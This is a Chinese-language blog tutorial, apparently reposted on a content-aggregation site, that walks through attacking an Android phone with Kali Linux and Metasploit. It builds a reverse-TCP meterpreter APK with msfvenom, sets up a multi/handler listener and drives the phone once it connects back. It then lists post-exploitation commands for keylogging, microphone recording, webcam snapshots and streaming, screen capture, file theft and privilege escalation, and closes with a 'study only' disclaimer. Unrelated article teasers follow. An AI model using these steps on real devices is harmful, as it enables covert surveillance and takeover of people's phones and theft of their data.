KALI使用MSF攻擊安卓設備

這期是kali使用MSF進行安卓滲透的保姆級別教程,話不多說,直接開始。

準備材料:

1.裝有kali的實體機或虛擬機(這里用實體機進行演示)

2.一臺安卓10.0以下的手機

打開kali,先用ifconfig查看自己的kali IP地址:

9e5f20f815554cbba78f5a0166950b24.pngkali查看IP?

圖中,wlan0上的192.168.2.247就是我的IP地址,記住你自己的。

然后,我們打開kali已root的終端,在上面輸入以下代碼,生成安裝包,注意端口一定是沒有用的,IP為你自己kali的IP地址:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的kali ip lport=沒有占用的端口 R >自定義名稱.apk

?eg:

?
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.247 lport=30094 R >and.apk?

生成后效果如圖 :

8a5182388420443e810f4d881e745a00.png

現在準備工作做完了,我們下一步運行msfconsole

在root終端輸入msfconsole運行,程序加載完后就會出現msf6 >(不好意思,忘了截圖了),這時我們輸入以下代碼選擇程序:

use exploit/multi/handler

如圖:

e4d68aa5f17f4bff9d78120960d851e4.png??

然后我們輸入以下代碼選擇攻擊模塊:

set payload android/meterpreter/reverse_tcp

如圖:

c34301a94df649748598c6999055df1b.png?

下面設置本地ip:

set LHOST 本地ip

2cb2f1432e0d40368832b547fb3a7a80.pngip設置?

設置端口:

set lport 你選擇的端口

?敲黑板:上面的ip和端口早在建立安裝包就設置好了,不知道的去看第二步!

我們鍵入

show options

?來查看配置情況:e090421010ba40429d9bd49dc657d50c.png

?

萬事俱備,我們輸入run來啟動程序,輸入完成后在手機上點擊剛才我們裝好的應用,注意,點開應用后不會有任何反應,但應用已經進入后臺運行,不必重復打開!

注意這一步最關鍵,主機和手機必須在同一局域網下,連接成功后如圖:8fbcb5885bed47de9cc2fb4470744305.png連接成功如圖?

有很多人在這一步失敗了,要么沒反應,要么代碼亂竄個不停,那就是網絡或手機的問題。

現在我們輸入一個指令,讓手機打開一個應用:991b815a393d455ea7385ba771c0517f.png

app_run 應用名稱

應用名稱就是上面com.開頭的那個,不是漢語拼音!

視頻效果:

打開應用

?

還可以使用:

webcam_snap

?命令拍照。

還可以使用

play wav路徑

命令播放wav音頻。

視頻效果:

wav文件播放

更多命令輸入help查看。


cmd指令:

cat 讀取文件內容到屏幕

cd 更改目錄

checksum 檢索文件的校驗和

cp 將源復制到目標

del 刪除指定文件

dir 列出文件(ls 的別名)

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創建目錄

mv 將源移動到目標

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點/邏輯驅動器

upload 上傳文件或目錄

pkill 按名稱終止進程

meterpreter命令:

keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)

keyscan_dump 轉儲按鍵緩沖(下載鍵盤記錄)

keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)

record_mic X秒從默認的麥克風record_mic音頻記錄(音頻錄制)

webcam_chat 開始視頻聊天(視頻,對方會有彈窗)

webcam_list 單攝像頭(查看攝像頭列表)

webcam_snap 采取快照從指定的攝像頭(攝像頭拍攝一張照片)

webcam_stream 播放視頻流從指定的攝像頭(開啟攝像頭監控)

enumdesktops 列出所有可訪問的桌面和窗口站(窗體列表)

getdesktop 得到當前的Meterpreter桌面

reboot 重新啟動遠程計算機

shutdown 關閉遠程計算機

shell 放入系統命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當前的meterpreter桌面

idletime 返回遠程用戶空閑的秒數

keyboard_send 發送擊鍵

keyevent 發送按鍵事件

keyscan_dump 轉儲擊鍵緩沖區

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發送鼠標事件

screenshare 實時觀看遠程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當前桌面

uictl 控制一些用戶界面組件

record_mic 從默認麥克風錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網絡攝像頭

webcam_snap 從指定的網絡攝像頭拍攝快照

webcam_stream 播放來自指定網絡攝像頭的視頻流

play 在目標系統上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權限提升到本地系統的權限

execute -f notepad 打開記事本

?溫馨提示:

遵紀守法,如出現各種法律問題與作者無關,技術沒有好壞,關鍵是看你怎么使用,本文章僅供學習與交流使用,轉載須標明出處,如有不足請大佬指出,感謝觀看!

?

?

?

?

?

?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/45042.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/45042.shtml
英文地址,請注明出處:http://en.pswp.cn/web/45042.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Python3極簡教程(一小時學完)下

目錄 PEP8 代碼風格指南 知識點 介紹 愚蠢的一致性就像沒腦子的妖怪 代碼排版 縮進 制表符還是空格 每行最大長度 空行 源文件編碼 導入包 字符串引號 表達式和語句中的空格 不能忍受的情況 其他建議 注釋 塊注釋 行內注釋 文檔字符串 版本注記 命名約定 …

[BJDCTF2020]EasySearch1

知識點: 1.swp泄露 2.md5碰撞 3.PHP代碼審計 4.SSI代碼執行漏洞 // Apache SSI 遠程命令執行漏洞復現 看著像sql注入,不過注入無果,掃一下目錄試試~ 發現是swp泄露. SWP文件泄露漏洞是指在使用 Vim編輯器 編輯一個文件時,Vim會在…

codeforce 954 div3 G2題

思路&#xff1a; 質因子分解可以順著分解&#xff0c;也可以逆著分解 即找到每一個數字的倍數&#xff0c;再找到每一個數字的因數 const int N 5e510; vector<int> ff[N]; vector<int> f[N]; vector<int> g[N];void solve(){int n;cin>>n;vector&l…

OpenCV漫水填充函數floodFill函數的使用

操作系統&#xff1a;ubuntu22.04 OpenCV版本&#xff1a;OpenCV4.9 IDE:Visual Studio Code 編程語言&#xff1a;C11 功能描述 ffloodFill函數是OpenCV庫中用于圖像處理的一個功能&#xff0c;它用于填充與種子點顏色相近的連通區域。這個函數在很多場景下都非常有用&#x…

MUR2060CTR-ASEMI無人機專用MUR2060CTR

編輯&#xff1a;ll MUR2060CTR-ASEMI無人機專用MUR2060CTR 型號&#xff1a;MUR2060CTR 品牌&#xff1a;ASEMI 封裝&#xff1a;TO-220 批號&#xff1a;最新 最大平均正向電流&#xff08;IF&#xff09;&#xff1a;20A 最大循環峰值反向電壓&#xff08;VRRM&#…

【數據結構】線性表----隊列詳解

1. 隊列的基本概念 話不多說&#xff0c;直接開始&#xff01; 隊列是一種線性數據結構&#xff0c;同棧類似但又不同&#xff0c;遵循先進先出&#xff08;FIFO, First In First Out&#xff09;的原則。換句話說&#xff0c;最先進入隊列的元素會最先被移除。這樣的特點使得…

小白學python(第七天)

哈哈&#xff0c;這個系列的文章也有一段時間沒更新&#xff0c;主要是最近在忙c嘎嘎&#xff0c;不過沒事接下來會優先更python啦&#xff0c;那么我們先進入正題吧 函數的定義及調用 函數定義 格式&#xff1a;def 函數名&#xff08;形參列表&#xff09;&#xff1a; 語…

QTabWidget、QListWidget、QStackedWidget

The QTabWidget class provides a stack of tabbed widgets. More... The QListWidget class provides an item-based list widget. More... QStringList strlist;strlist<<"系統"<<"外觀"<<"截圖"<<"貼圖"…

.NET MAUI開源架構_4..NET MAUI 應用支持的平臺

可以針對以下平臺編寫 .NET Multi-platform App UI (.NET MAUI) 應用&#xff1a; 需要 Android 5.0 (API 21) 或更高版本。需要 iOS 11 或更高版本使用 Mac Catalyst 的 macOS 11 或更高版本。Windows 11 和 Windows 10 版本 1809 或更高版本&#xff0c;使用 Windows UI 庫 …

Java的高級特性

類的繼承 繼承是從已有的類中派生出新的類&#xff0c;新的類能擁有已有類的屬性和行為&#xff0c;并且可以拓展新的屬性和行為 public class 子類 extends 父類{子類類體 } 優點 代碼的復用 提高編碼效率 易于維護 使類與類產生關聯&#xff0c;是多態的前提 缺點 類缺乏獨…

c/c++ 打印調用棧

打印調用棧可以在程序出現死機的時候&#xff08;如出現 SIGABRT、SIGSEGV等一些信號錯誤&#xff09;是很有用的信息&#xff0c;有可能就不需要 core file 來協助排查問題了。通過 man backtrace 可以得到一個例子的源碼&#xff1a; #define SIZE 100 static void backTrac…

【機器學習-00】機器學習是什么?

在科技飛速發展的今天&#xff0c;機器學習已成為一個熱門話題&#xff0c;廣泛應用于各個行業和領域。那么&#xff0c;機器學習到底是什么&#xff1f;它又是如何工作的&#xff1f;本文將深入探討機器學習的定義、原理及其在各領域的應用&#xff0c;帶領讀者走進這個神秘而…

RedisTemplate 中序列化方式辨析

在Spring Data Redis中&#xff0c;RedisTemplate 是操作Redis的核心類&#xff0c;它提供了豐富的API來與Redis進行交互。由于Redis是一個鍵值存儲系統&#xff0c;它存儲的是字節序列&#xff0c;因此在使用RedisTemplate時&#xff0c;需要指定鍵&#xff08;Key&#xff09…

力扣題解( 等差數列劃分 II - 子序列)

446. 等差數列劃分 II - 子序列 給你一個整數數組 nums &#xff0c;返回 nums 中所有 等差子序列 的數目。 如果一個序列中 至少有三個元素 &#xff0c;并且任意兩個相鄰元素之差相同&#xff0c;則稱該序列為等差序列。 例如&#xff0c;[1, 3, 5, 7, 9]、[7, 7, 7, 7] 和…

Netgear WN604 downloadFile.php 信息泄露漏洞復現(CVE-2024-6646)

0x01 產品簡介 NETGEAR WN604是一款由NETGEAR(網件)公司生產的無線接入器(或無線路由器)提供Wi-Fi保護協議(WPA2-PSK, WPA-PSK),以及有線等效加密(WEP)64位、128位和152位支持,保障網絡安全。同時支持MAC地址認證、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全機制,…

Flat Ads:金融APP海外廣告投放素材的優化指南

在當今全球化的數字營銷環境中,金融APP的海外營銷推廣已成為眾多金融機構與開發者最為關注的環節之一。面對不同地域、文化及用戶習慣的挑戰,如何優化廣告素材,以吸引目標受眾的注意并促成有效轉化,成為了廣告主們亟待解決的問題。 作為領先的全球化營銷推廣平臺,Flat Ads憑借…

超簡易高效的 AI繪圖工具—與sd-webui一致界面,6G顯存最高提升75%出圖速率!(附安裝包)

大家好&#xff0c;我是靈魂畫師向陽 今天給大家分享一個基于Stable Diffusion WebUI 構建的AI繪圖工具—sd-webui-forge&#xff0c;該工具的目標在于簡化插件開發&#xff0c;優化資源管理&#xff0c;加速推理。 Forge承諾永遠不會對Stable Diffusion WebUI用戶界面添加不…

獲獎案例回顧|基于衛星遙感和無人機的水稻全流程風險減量項目

引言 在現代農業保險領域&#xff0c;技術創新是推動行業進步的關鍵。珈和科技與太平財險的合作&#xff0c;旨在利用先進的衛星遙感和無人機技術&#xff0c;解決傳統農業保險面臨的諸多挑戰&#xff0c;從而提升保險效率和服務質量。本次分享的項目案例獲得了《金融電子化》…

啟動yarn后,其他節點沒有NodeManager

寫在前面&#xff1a; 這個問題雖然折磨了我兩天&#xff0c;但是原因特別蠢&#xff0c;可能與各位不一定一樣&#xff0c;我是因為ResourceManager的節點的"/etc/hadoop/workers"文件沒有配置好&#xff08;沒有配hadoop102和hadoop104&#xff09;&#xff0c;但排…

數字圖像處理(實踐篇)四十八 PCA主成分分析降維與圖像重建

目錄 一 PCA 二 實踐 實踐① 實踐② 一 PCA 主成分分析(PCA)是一種常見的數據分析技術,它可以用于降維和特征提取。 PCA 的作用包括以下幾個方面: ①數據降維:PCA 可以將高維數據降維到低維空間中,從而方便后續的數據分析和可視化。可以將具有多個變量的數據集降維…